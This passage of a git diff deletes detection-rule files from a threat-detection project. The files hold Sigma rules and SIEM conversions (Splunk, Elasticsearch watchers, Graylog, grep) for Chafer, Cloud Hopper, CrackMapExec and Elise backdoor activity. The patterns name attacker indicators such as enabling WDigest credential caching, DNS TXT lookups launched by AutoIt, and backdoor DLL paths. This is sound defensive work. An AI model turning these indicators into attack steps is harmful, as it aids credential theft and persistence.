-(winlog.event_id:"7045" AND winlog.event_data.ServiceName:("SC\ Scheduled\ Scan" OR "UpdatMachine"))
-(winlog.channel:"Security" AND winlog.event_id:"4698" AND TaskName:("SC\ Scheduled\ Scan" OR "UpdatMachine"))
-(winlog.channel:"Microsoft\-Windows\-Sysmon\/Operational" AND winlog.event_id:"13" AND winlog.event_data.EventType:"SetValue" AND (winlog.event_data.TargetObject.keyword:(*SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UMe OR *SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UT) OR (winlog.event_data.TargetObject.keyword:*\\Control\\SecurityProviders\\WDigest\\UseLogonCredential AND winlog.event_data.Details:"DWORD\ \(0x00000001\)")))
-(winlog.event_data.CommandLine.keyword:(*\\Service.exe\ i OR *\\Service.exe\ u OR *\\microsoft\\Taskbar\\autoit3.exe OR C\:\\wsc.exe*) OR winlog.event_data.Image.keyword:*\\Windows\\Temp\\DB\\*.exe OR (winlog.event_data.CommandLine.keyword:*\\nslookup.exe\ \-q\=TXT* AND winlog.event_data.ParentImage.keyword:*\\Autoit*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/53ba33fd-3a50-4468-a5ef-c583635cfa92 <<EOF
-{
-  "metadata": {
-    "title": "Chafer Activity",
-    "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018",
-    "tags": [
-      "attack.persistence",
-      "attack.g0049",
-      "attack.t1053",
-      "attack.s0111",
-      "attack.defense_evasion",
-      "attack.t1112"
-    ],
-    "query": "(winlog.event_id:\"7045\" AND winlog.event_data.ServiceName:(\"SC\\ Scheduled\\ Scan\" OR \"UpdatMachine\"))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_id:\"7045\" AND winlog.event_data.ServiceName:(\"SC\\ Scheduled\\ Scan\" OR \"UpdatMachine\"))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Chafer Activity'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/53ba33fd-3a50-4468-a5ef-c583635cfa92-2 <<EOF
-{
-  "metadata": {
-    "title": "Chafer Activity",
-    "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018",
-    "tags": [
-      "attack.persistence",
-      "attack.g0049",
-      "attack.t1053",
-      "attack.s0111",
-      "attack.defense_evasion",
-      "attack.t1112"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4698\" AND TaskName:(\"SC\\ Scheduled\\ Scan\" OR \"UpdatMachine\"))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4698\" AND TaskName:(\"SC\\ Scheduled\\ Scan\" OR \"UpdatMachine\"))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Chafer Activity'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/53ba33fd-3a50-4468-a5ef-c583635cfa92-3 <<EOF
-{
-  "metadata": {
-    "title": "Chafer Activity",
-    "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018",
-    "tags": [
-      "attack.persistence",
-      "attack.g0049",
-      "attack.t1053",
-      "attack.s0111",
-      "attack.defense_evasion",
-      "attack.t1112"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"13\" AND winlog.event_data.EventType:\"SetValue\" AND (winlog.event_data.TargetObject.keyword:(*SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UMe OR *SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UT) OR (winlog.event_data.TargetObject.keyword:*\\\\Control\\\\SecurityProviders\\\\WDigest\\\\UseLogonCredential AND winlog.event_data.Details:\"DWORD\\ \\(0x00000001\\)\")))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"13\" AND winlog.event_data.EventType:\"SetValue\" AND (winlog.event_data.TargetObject.keyword:(*SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UMe OR *SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UT) OR (winlog.event_data.TargetObject.keyword:*\\\\Control\\\\SecurityProviders\\\\WDigest\\\\UseLogonCredential AND winlog.event_data.Details:\"DWORD\\ \\(0x00000001\\)\")))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Chafer Activity'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/53ba33fd-3a50-4468-a5ef-c583635cfa92-4 <<EOF
-{
-  "metadata": {
-    "title": "Chafer Activity",
-    "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018",
-    "tags": [
-      "attack.persistence",
-      "attack.g0049",
-      "attack.t1053",
-      "attack.s0111",
-      "attack.defense_evasion",
-      "attack.t1112"
-    ],
-    "query": "(winlog.event_data.CommandLine.keyword:(*\\\\Service.exe\\ i OR *\\\\Service.exe\\ u OR *\\\\microsoft\\\\Taskbar\\\\autoit3.exe OR C\\:\\\\wsc.exe*) OR winlog.event_data.Image.keyword:*\\\\Windows\\\\Temp\\\\DB\\\\*.exe OR (winlog.event_data.CommandLine.keyword:*\\\\nslookup.exe\\ \\-q\\=TXT* AND winlog.event_data.ParentImage.keyword:*\\\\Autoit*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.CommandLine.keyword:(*\\\\Service.exe\\ i OR *\\\\Service.exe\\ u OR *\\\\microsoft\\\\Taskbar\\\\autoit3.exe OR C\\:\\\\wsc.exe*) OR winlog.event_data.Image.keyword:*\\\\Windows\\\\Temp\\\\DB\\\\*.exe OR (winlog.event_data.CommandLine.keyword:*\\\\nslookup.exe\\ \\-q\\=TXT* AND winlog.event_data.ParentImage.keyword:*\\\\Autoit*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Chafer Activity'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"7045" AND ServiceName:("SC Scheduled Scan" "UpdatMachine"))
-(EventID:"4698" AND TaskName:("SC Scheduled Scan" "UpdatMachine"))
-(EventID:"13" AND EventType:"SetValue" AND (TargetObject.keyword:(*SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UMe *SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UT) OR (TargetObject.keyword:*\\Control\\SecurityProviders\\WDigest\\UseLogonCredential AND Details:"DWORD \(0x00000001\)")))
-(CommandLine.keyword:(*\\Service.exe i *\\Service.exe u *\\microsoft\\Taskbar\\autoit3.exe C\:\\wsc.exe*) OR Image.keyword:*\\Windows\\Temp\\DB\\*.exe OR (CommandLine.keyword:*\\nslookup.exe \-q=TXT* AND ParentImage.keyword:*\\Autoit*))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:System" EventCode="7045" (ServiceName="SC Scheduled Scan" OR ServiceName="UpdatMachine"))
-(source="WinEventLog:Security" EventCode="4698" (TaskName="SC Scheduled Scan" OR TaskName="UpdatMachine"))
-(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="13" EventType="SetValue" ((TargetObject="*SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UMe" OR TargetObject="*SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UT") OR (TargetObject="*\\Control\\SecurityProviders\\WDigest\\UseLogonCredential" Details="DWORD (0x00000001)")))
-((CommandLine="*\\Service.exe i" OR CommandLine="*\\Service.exe u" OR CommandLine="*\\microsoft\\Taskbar\\autoit3.exe" OR CommandLine="C:\\wsc.exe*") OR Image="*\\Windows\\Temp\\DB\\*.exe" OR (CommandLine="*\\nslookup.exe -q=TXT*" ParentImage="*\\Autoit*"))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="7045" service IN ["SC Scheduled Scan", "UpdatMachine"])
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4698" TaskName IN ["SC Scheduled Scan", "UpdatMachine"])
-(event_id="13" EventType="SetValue" (TargetObject IN ["*SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UMe", "*SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UT"] OR (TargetObject="*\\Control\\SecurityProviders\\WDigest\\UseLogonCredential" Details="DWORD (0x00000001)")))
-(event_id="1" (CommandLine IN ["*\\Service.exe i", "*\\Service.exe u", "*\\microsoft\\Taskbar\\autoit3.exe", "C:\\wsc.exe*"] OR Image="*\\Windows\\Temp\\DB\\*.exe" OR (CommandLine="*\\nslookup.exe -q=TXT*" ParentImage="*\\Autoit*")))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*7045)(?=.*(?:.*SC Scheduled Scan|.*UpdatMachine)))'
-grep -P '^(?:.*(?=.*4698)(?=.*(?:.*SC Scheduled Scan|.*UpdatMachine)))'
-grep -P '^(?:.*(?=.*13)(?=.*SetValue)(?=.*(?:.*(?:.*(?:.*.*SOFTWARE\Microsoft\Windows\CurrentVersion\UMe|.*.*SOFTWARE\Microsoft\Windows\CurrentVersion\UT)|.*(?:.*(?=.*.*\Control\SecurityProviders\WDigest\UseLogonCredential)(?=.*DWORD \(0x00000001\)))))))'
-grep -P '^(?:.*(?:.*(?:.*.*\Service\.exe i|.*.*\Service\.exe u|.*.*\microsoft\Taskbar\autoit3\.exe|.*C:\wsc\.exe.*)|.*.*\Windows\Temp\DB\\.*\.exe|.*(?:.*(?=.*.*\nslookup\.exe -q=TXT.*)(?=.*.*\Autoit.*))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_apt_cloudhopper.md b/Atomic_Threat_Coverage/Detection_Rules/win_apt_cloudhopper.md
deleted file mode 100644
index a8690ef..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_apt_cloudhopper.md
+++ /dev/null
@@ -1,179 +0,0 @@
-| Title                    | WMIExec VBS Script       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious file execution by wscript and cscript |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1064: Scripting](https://attack.mitre.org/techniques/T1064)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unlikely</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.g0045</li><li>attack.t1059.005</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: WMIExec VBS Script
-id: 966e4016-627f-44f7-8341-f394905c361f
-description: Detects suspicious file execution by wscript and cscript
-author: Florian Roth
-date: 2017/04/07
-references:
-    - https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
-tags:
-    - attack.execution
-    - attack.g0045
-    - attack.t1064
-    - attack.t1059.005
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image: '*\cscript.exe'
-        CommandLine: '*.vbs /shell *'
-    condition: selection
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Unlikely
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\cscript.exe" -and $_.message -match "CommandLine.*.*.vbs /shell .*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\cscript.exe AND winlog.event_data.CommandLine.keyword:*.vbs\ \/shell\ *)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/966e4016-627f-44f7-8341-f394905c361f <<EOF
-{
-  "metadata": {
-    "title": "WMIExec VBS Script",
-    "description": "Detects suspicious file execution by wscript and cscript",
-    "tags": [
-      "attack.execution",
-      "attack.g0045",
-      "attack.t1064",
-      "attack.t1059.005"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\cscript.exe AND winlog.event_data.CommandLine.keyword:*.vbs\\ \\/shell\\ *)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\cscript.exe AND winlog.event_data.CommandLine.keyword:*.vbs\\ \\/shell\\ *)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'WMIExec VBS Script'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\cscript.exe AND CommandLine.keyword:*.vbs \/shell *)
-```
-
-
-### splunk
-    
-```
-(Image="*\\cscript.exe" CommandLine="*.vbs /shell *") | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\cscript.exe" CommandLine="*.vbs /shell *")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\cscript\.exe)(?=.*.*\.vbs /shell .*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_apt_dragonfly.md b/Atomic_Threat_Coverage/Detection_Rules/win_apt_dragonfly.md
deleted file mode 100644
index f5f2208..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_apt_dragonfly.md
+++ /dev/null
@@ -1,171 +0,0 @@
-| Title                    | CrackMapExecWin       |
-|:-------------------------|:------------------|
-| **Description**          | Detects CrackMapExecWin Activity as Described by NCSC |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          | <ul><li>[DN0001_4688_windows_process_creation](../Data_Needed/DN0001_4688_windows_process_creation.md)</li><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>None</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control](https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control)</li></ul>  |
-| **Author**               | Markus Neis |
-| Other Tags           | <ul><li>attack.g0035</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: CrackMapExecWin
-id: 04d9079e-3905-4b70-ad37-6bdf11304965
-description: Detects CrackMapExecWin Activity as Described by NCSC
-status: experimental
-references:
-    - https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control
-tags:
-    - attack.g0035
-author: Markus Neis
-date: 2018/04/08
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image:
-            - '*\crackmapexec.exe'
-    condition: selection
-falsepositives:
-    - None
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Image.*.*\\crackmapexec.exe")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.Image.keyword:(*\\crackmapexec.exe)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/04d9079e-3905-4b70-ad37-6bdf11304965 <<EOF
-{
-  "metadata": {
-    "title": "CrackMapExecWin",
-    "description": "Detects CrackMapExecWin Activity as Described by NCSC",
-    "tags": [
-      "attack.g0035"
-    ],
-    "query": "winlog.event_data.Image.keyword:(*\\\\crackmapexec.exe)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.Image.keyword:(*\\\\crackmapexec.exe)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'CrackMapExecWin'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-Image.keyword:(*\\crackmapexec.exe)
-```
-
-
-### splunk
-    
-```
-(Image="*\\crackmapexec.exe")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image IN ["*\\crackmapexec.exe"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.*\crackmapexec\.exe)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_apt_elise.md b/Atomic_Threat_Coverage/Detection_Rules/win_apt_elise.md
deleted file mode 100644
index df5ba16..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_apt_elise.md
+++ /dev/null
@@ -1,177 +0,0 @@
-| Title                    | Elise Backdoor       |
-|:-------------------------|:------------------|
-| **Description**          | Detects Elise backdoor acitivty as used by APT32 |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://community.rsa.com/community/products/netwitness/blog/2018/02/13/lotus-blossom-continues-asean-targeting](https://community.rsa.com/community/products/netwitness/blog/2018/02/13/lotus-blossom-continues-asean-targeting)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.g0030</li><li>attack.g0050</li><li>attack.s0081</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Elise Backdoor
-id: e507feb7-5f73-4ef6-a970-91bb6f6d744f
-status: experimental
-description: Detects Elise backdoor acitivty as used by APT32
-references:
-    - https://community.rsa.com/community/products/netwitness/blog/2018/02/13/lotus-blossom-continues-asean-targeting
-tags:
-    - attack.g0030
-    - attack.g0050
-    - attack.s0081
-author: Florian Roth
-date: 2018/01/31
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        Image: 'C:\Windows\SysWOW64\cmd.exe'
-        CommandLine: '*\Windows\Caches\NavShExt.dll *'
-    selection2:
-        CommandLine: '*\AppData\Roaming\MICROS~1\Windows\Caches\NavShExt.dll,Setting'
-    condition: 1 of them
-falsepositives:
-    - Unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and (($_.message -match "Image.*C:\\Windows\\SysWOW64\\cmd.exe" -and $_.message -match "CommandLine.*.*\\Windows\\Caches\\NavShExt.dll .*") -or $_.message -match "CommandLine.*.*\\AppData\\Roaming\\MICROS~1\\Windows\\Caches\\NavShExt.dll,Setting")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.Image:"C\:\\Windows\\SysWOW64\\cmd.exe" AND winlog.event_data.CommandLine.keyword:*\\Windows\\Caches\\NavShExt.dll\ *) OR winlog.event_data.CommandLine.keyword:*\\AppData\\Roaming\\MICROS\~1\\Windows\\Caches\\NavShExt.dll,Setting)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/e507feb7-5f73-4ef6-a970-91bb6f6d744f <<EOF
-{
-  "metadata": {
-    "title": "Elise Backdoor",
-    "description": "Detects Elise backdoor acitivty as used by APT32",
-    "tags": [
-      "attack.g0030",
-      "attack.g0050",
-      "attack.s0081"
-    ],
-    "query": "((winlog.event_data.Image:\"C\\:\\\\Windows\\\\SysWOW64\\\\cmd.exe\" AND winlog.event_data.CommandLine.keyword:*\\\\Windows\\\\Caches\\\\NavShExt.dll\\ *) OR winlog.event_data.CommandLine.keyword:*\\\\AppData\\\\Roaming\\\\MICROS\\~1\\\\Windows\\\\Caches\\\\NavShExt.dll,Setting)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.Image:\"C\\:\\\\Windows\\\\SysWOW64\\\\cmd.exe\" AND winlog.event_data.CommandLine.keyword:*\\\\Windows\\\\Caches\\\\NavShExt.dll\\ *) OR winlog.event_data.CommandLine.keyword:*\\\\AppData\\\\Roaming\\\\MICROS\\~1\\\\Windows\\\\Caches\\\\NavShExt.dll,Setting)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Elise Backdoor'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((Image:"C\:\\Windows\\SysWOW64\\cmd.exe" AND CommandLine.keyword:*\\Windows\\Caches\\NavShExt.dll *) OR CommandLine.keyword:*\\AppData\\Roaming\\MICROS\~1\\Windows\\Caches\\NavShExt.dll,Setting)
-```
-
-
-### splunk
-    
-```
-((Image="C:\\Windows\\SysWOW64\\cmd.exe" CommandLine="*\\Windows\\Caches\\NavShExt.dll *") OR CommandLine="*\\AppData\\Roaming\\MICROS~1\\Windows\\Caches\\NavShExt.dll,Setting")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ((Image="C:\\Windows\\SysWOW64\\cmd.exe" CommandLine="*\\Windows\\Caches\\NavShExt.dll *") OR CommandLine="*\\AppData\\Roaming\\MICROS~1\\Windows\\Caches\\NavShExt.dll,Setting"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?=.*C:\Windows\SysWOW64\cmd\.exe)(?=.*.*\Windows\Caches\NavShExt\.dll .*))|.*.*\AppData\Roaming\MICROS~1\Windows\Caches\NavShExt\.dll,Setting))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_apt_emissarypanda_sep19.md b/Atomic_Threat_Coverage/Detection_Rules/win_apt_emissarypanda_sep19.md
deleted file mode 100644
index be0d252..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_apt_emissarypanda_sep19.md
+++ /dev/null
@@ -1,168 +0,0 @@
